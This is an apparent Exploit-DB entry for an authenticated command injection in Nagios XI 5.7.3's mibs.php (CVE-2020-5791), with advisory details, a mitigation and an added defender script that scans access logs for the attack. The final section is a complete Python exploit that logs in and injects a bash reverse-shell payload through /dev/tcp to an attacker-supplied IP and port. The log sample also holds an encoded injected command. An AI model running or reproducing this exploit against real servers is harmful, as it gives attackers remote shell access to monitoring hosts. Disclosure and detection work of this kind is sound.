Vendor: Nagios XI
By: Matthew Aberegg
CVSS: 7.2 (HIGH)
Vulnerability Type: Remote Command Injection
CWE: CWE-78 (OS Command Injection)
Product Name: Nagios XI
Affected Version From: Nagios XI 5.7.3
Affected Version To: Nagios XI 5.7.3
Patch Exists: YES
CVE: CVE-2020-5791
CPE: a:nagios:nagios_xi
Other Scripts: N/A
Platforms Tested: Ubuntu 20.04
Year: 2020

Nagios XI 5.7.3 – ‘mibs.php’ Remote Command Injection (Authenticated)

A remote command injection vulnerability exists in Nagios XI 5.7.3. The 'mibs.php' script does not sufficiently sanitize user-supplied input, so an authenticated attacker who sends a specially crafted HTTP request to the vulnerable script can execute arbitrary commands on the underlying operating system. Successful exploitation results in arbitrary code execution with the privileges of the web application.

Mitigation:

Upgrade to Nagios XI 5.7.4 or later.
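As an added defender-side example (not part of the Exploit-DB entry or of Nagios XI's own code), the following Python script scans Apache-style access-log lines for the request pattern the advisory describes: a hit on /nagiosxi/admin/mibs.php whose percent-decoded file parameter contains shell metacharacters. The log lines, client addresses and timestamps are constructed for the example; the script path and the file parameter are the ones the published exploit uses.

```python
import re
import urllib.parse

# Constructed sample access-log lines (Apache "combined" format). Hosts,
# timestamps, user agents and the request to mibs.php are all made up for
# this example; nothing here is taken from a real Nagios XI server.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2020:14:02:11 +0000] "GET /nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=SNMPv2-MIB.txt HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2020:14:05:43 +0000] "GET /nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=%3B%2Fbin%2Fbash+-c+%27id%27%3B HTTP/1.1" 200 88 "-" "python-requests/2.24.0"
10.0.0.9 - - [27/Oct/2020:14:05:44 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 9120 "-" "python-requests/2.24.0"
"""

# Combined log format: client, timestamp, method, URL, protocol, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no business in a MIB file name. The check is
# run on the *decoded* parameter value, so %3B and %26 are caught as ; and &.
SHELL_META = re.compile(r'[;&|`$<>\n]')

# Script named in the advisory and the parameter the published exploit abuses.
TARGET_SCRIPT = "/nagiosxi/admin/mibs.php"
TARGET_PARAM = "file"


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urllib.parse.urlsplit(entry["url"])
    entry["script"] = url.path
    # parse_qs percent-decodes values and turns '+' into spaces; keep the
    # first value of each parameter.
    entry["params"] = {
        k: v[0]
        for k, v in urllib.parse.parse_qs(url.query, keep_blank_values=True).items()
    }
    return entry


def is_suspicious(entry):
    """True when the request targets mibs.php with shell metacharacters in 'file'."""
    if entry is None or not entry["script"].endswith(TARGET_SCRIPT):
        return False
    value = entry["params"].get(TARGET_PARAM, "")
    return SHELL_META.search(value) is not None


def scan(log_text):
    """Return one finding per suspicious line: client, timestamp, decoded value, status."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if is_suspicious(entry):
            findings.append({
                "ip": entry["ip"],
                "ts": entry["ts"],
                "file": entry["params"][TARGET_PARAM],
                "status": entry["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("{ts} {ip} status={status} file={file!r}".format(**f))
```

The match runs on the decoded value rather than the raw URL so that URL-encoded metacharacters are not missed. Because the flaw is only reachable after authentication, a finding is worth correlating with the login.php POST from the same client that precedes it, and with any unexpected outbound connection from the Nagios host around the same timestamp.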

Exploit-DB raw data:

# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    
    if res.status_code != 200:
        print("[~] Failed to connect")
    
if __name__ == '__main__':
    exploit()